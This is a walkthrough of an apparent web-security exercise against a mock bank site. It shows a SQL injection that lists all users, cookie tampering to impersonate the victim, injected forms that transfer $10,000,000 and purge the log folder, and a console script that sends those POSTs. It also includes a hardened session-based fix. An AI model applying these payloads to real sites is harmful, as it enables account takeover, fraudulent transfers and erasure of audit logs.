Cookie Injection, JavaScript Injection & SQL Injection Method

Information

From navigating the site and reading the page source, we gather the following information:

Register pages (Register.php > register2.php):
  • <input type="text" name="username" maxlength=10>
  • <input type="password" name="password" maxlength=50>
  • <textarea name="desc" rows=5 cols=20 maxlength=255>
Login pages (login1.php > login2.php):
  • <input type="text" name="username" value="Enter Username">
  • <input type="password" name="Password" value="">
Purge files (cleardir.php):
  • <input type='hidden' name='dir' value='loginSQLFiles'>
Transfer money from one account to another (movemoney.php):
  • <input type='text' name='TO' value='Username To Give Money To'>
  • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Gary Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, enter the following in the URL bar (or in the browser's JavaScript console, since current browsers strip the javascript: prefix from text pasted into the URL bar):

javascript:alert(document.cookie);

The alert shows our two authentication cookies, accountUsername and accountPassword, in cleartext. The logged-in identity lives in client-side cookies rather than in a server-side session, which is the weakness we exploit in Objective 2. Next open the user info page and enter the following SQL injection in its input field to list all users:

' or 'a'='a

By scrolling down, we find:

GaryWilliamHunter : — $$$$$ —

The two values are separated by a colon:

  • Before the colon: the login (GaryWilliamHunter)
  • After the colon: the description (— $$$$$ —)

Objective 2: Move the $10,000,000 into the account dropCash

By entering the following code in the URL bar (or the JavaScript console), we confirm that the site is vulnerable to cookie tampering: the cookies hold the account name and password in cleartext, and the server takes the acting account from the accountUsername cookie, so whatever account name we put there is the one the transfer is debited from.

javascript:alert(document.cookie);
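To make the weakness concrete, here is an added example (not code from the walkthrough or from the target site) that models movemoney.php as a function and compares the identity check the page implies (the cookie names the acting account; the walkthrough needs only accountUsername changed, so accountPassword is not consulted) with a hardened variant that keeps the username server-side behind an opaque session id. The ledger, the balances, the password strings and the session id are constructed for the example; only the cookie names and the TO/AMOUNT fields come from the page.

```javascript
// Added example, not from the original post: why editing accountUsername works,
// next to the fix. Account data, passwords and the session id are constructed.

// Parse a Cookie request header ("a=1; b=2") into an object.
function parseCookieHeader(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = decodeURIComponent(part.slice(i + 1).trim());
  }
  return out;
}

// Constructed server-side state: accounts plus, for the hardened variant,
// a session table mapping an opaque id to the logged-in username.
function makeLedger() {
  return {
    accounts: {
      GaryWilliamHunter: { password: 'unknown-to-us', balance: 10000000 },
      attacker:          { password: 'attacker-pass', balance: 0 },
      dropCash:          { password: 'drop-pass',     balance: 0 },
    },
    sessions: { 'f3a1c9e2b8d7': 'attacker' },  // attacker's own valid session
  };
}

// Vulnerable identity check, as the walkthrough implies: the acting account is
// whatever accountUsername says, as long as such an account exists.
function identityFromCookie(ledger, cookieHeader) {
  const c = parseCookieHeader(cookieHeader);
  return c.accountUsername in ledger.accounts ? c.accountUsername : null;
}

// Hardened identity check: the cookie carries only an opaque session id and the
// username is looked up server-side, so client-edited cookie values cannot
// change who is acting.
function identityFromSession(ledger, cookieHeader) {
  const c = parseCookieHeader(cookieHeader);
  return ledger.sessions[c.sessionId] || null;
}

// movemoney.php as a function: move fields.AMOUNT from the acting account to fields.TO.
function moveMoney(ledger, identify, cookieHeader, fields) {
  const from = identify(ledger, cookieHeader);
  if (from === null) return { ok: false, reason: 'not authenticated' };
  const amount = Number(fields.AMOUNT);
  const src = ledger.accounts[from];
  const dst = ledger.accounts[fields.TO];
  if (!dst || !Number.isInteger(amount) || amount <= 0 || src.balance < amount) {
    return { ok: false, reason: 'bad transfer' };
  }
  src.balance -= amount;
  dst.balance += amount;
  return { ok: true, from, to: fields.TO, amount };
}

// The attacker logged in as "attacker", then rewrote accountUsername in the browser.
function demo() {
  const forged = 'accountUsername=GaryWilliamHunter; accountPassword=attacker-pass';
  const fields = { TO: 'dropCash', AMOUNT: '10000000' };
  const vuln = makeLedger();
  const hard = makeLedger();
  return {
    vulnerable: moveMoney(vuln, identityFromCookie, forged, fields),
    hardened:   moveMoney(hard, identityFromSession, forged + '; sessionId=f3a1c9e2b8d7', fields),
    vulnBalances: { gary: vuln.accounts.GaryWilliamHunter.balance, drop: vuln.accounts.dropCash.balance },
    hardBalances: { gary: hard.accounts.GaryWilliamHunter.balance, drop: hard.accounts.dropCash.balance },
  };
}
```

Against the vulnerable check the forged cookie debits GaryWilliamHunter for the full amount; against the session-based check the same cookie is still the attacker's own session, whose balance is zero, so the transfer is refused and Gary's balance is untouched.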

Install the Firebug and Firecookie add-ons for Firefox. Using Firecookie, change the value of the cookie named "accountUsername" to "GaryWilliamHunter", then use the following JS injection (copy/paste into the URL bar):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It dynamically writes a form into the page containing the values needed for the transfer:

  • FORM ACTION: movemoney.php, the transfer page identified during information gathering
  • Source account: not a form field at all; the server takes it from the accountUsername cookie, which we changed to GaryWilliamHunter
  • TO: dropCash, as stated in the exercise; the field name comes from the information we gathered
  • AMOUNT: 10000000, as stated in the exercise; the field name comes from the information we gathered

Submitting the form completes the stage.

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste the following code into the URL bar. It builds the same kind of form, this time posting to cleardir.php with the hidden dir field set to logFiles instead of its default value loginSQLFiles:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))
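The same two requests (the transfer in Objective 2 and the purge in Objective 3), as an added example that is not part of the original walkthrough: it runs from the browser's JavaScript console rather than the URL bar (current browsers strip javascript: from pasted URLs), sets the cookie with document.cookie instead of an add-on, and appends a real form element rather than calling document.write, which on an already loaded page discards the current document first. It assumes the paths, field names and cookie name listed in the Information section, and that the cookie was set for the current path so that re-assigning document.cookie without a path attribute overwrites it.

```javascript
// Added example (not from the original walkthrough): deliver the forged-cookie
// POSTs for movemoney.php and cleardir.php from the browser console. Paths,
// field names and the cookie name are taken from the Information section; the
// cookie path is assumed to match the current page.

// Return `cookieString` ("k=v; k2=v2", the format of document.cookie) with
// `name` set to `value`, replacing any existing pair of that name.
function setCookieValue(cookieString, name, value) {
  const pairs = cookieString
    .split(';')
    .map(p => p.trim())
    .filter(p => p.length > 0)
    .map(p => {
      const i = p.indexOf('=');
      return i < 0 ? [p, ''] : [p.slice(0, i), p.slice(i + 1)];
    })
    .filter(([k]) => k !== name);
  pairs.push([name, value]);
  return pairs.map(([k, v]) => `${k}=${v}`).join('; ');
}

// Build the application/x-www-form-urlencoded body the POST form will send.
function formBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(String(v))}`)
    .join('&');
}

// The two requests, as data rather than as HTML pasted into document.write.
const transfer = { action: 'movemoney.php', fields: { TO: 'dropCash', AMOUNT: 10000000 } };
const purge    = { action: 'cleardir.php',  fields: { dir: 'logFiles' } };

// Browser only: overwrite the accountUsername cookie, then build a <form>
// element with hidden inputs and submit it, leaving the current page intact.
function submitAs(username, req) {
  document.cookie = `accountUsername=${encodeURIComponent(username)}`;
  const form = document.createElement('form');
  form.method = 'post';
  form.action = req.action;
  for (const [name, value] of Object.entries(req.fields)) {
    const input = document.createElement('input');
    input.type = 'hidden';
    input.name = name;
    input.value = String(value);
    form.appendChild(input);
  }
  document.body.appendChild(form);
  form.submit();
}

// In a browser console run the transfer first; once the response page has
// loaded, run the purge the same way. Under Node there is no document, so
// nothing is sent and only the helpers above are exercised.
if (typeof document !== 'undefined') {
  submitAs('GaryWilliamHunter', transfer);
  // submitAs('GaryWilliamHunter', purge);
}
```

setCookieValue is what a Firecookie-style edit does to the cookie string, which is useful when checking what document.cookie should look like before and after the change; formBody shows the exact bytes the hidden-input form sends, so the same requests can be replayed from any HTTP client with a Cookie header instead of from the browser.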

PS: You can also use the Firefox add-on "Tamper Data" or Google Chrome's "Inspect Element" option instead of Firecookie and Firebug.

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by the entrepreneurial bug, I got kicked out of college and ended up being a millionaire and running a digital media company named Aeron7, headquartered in Lithuania.
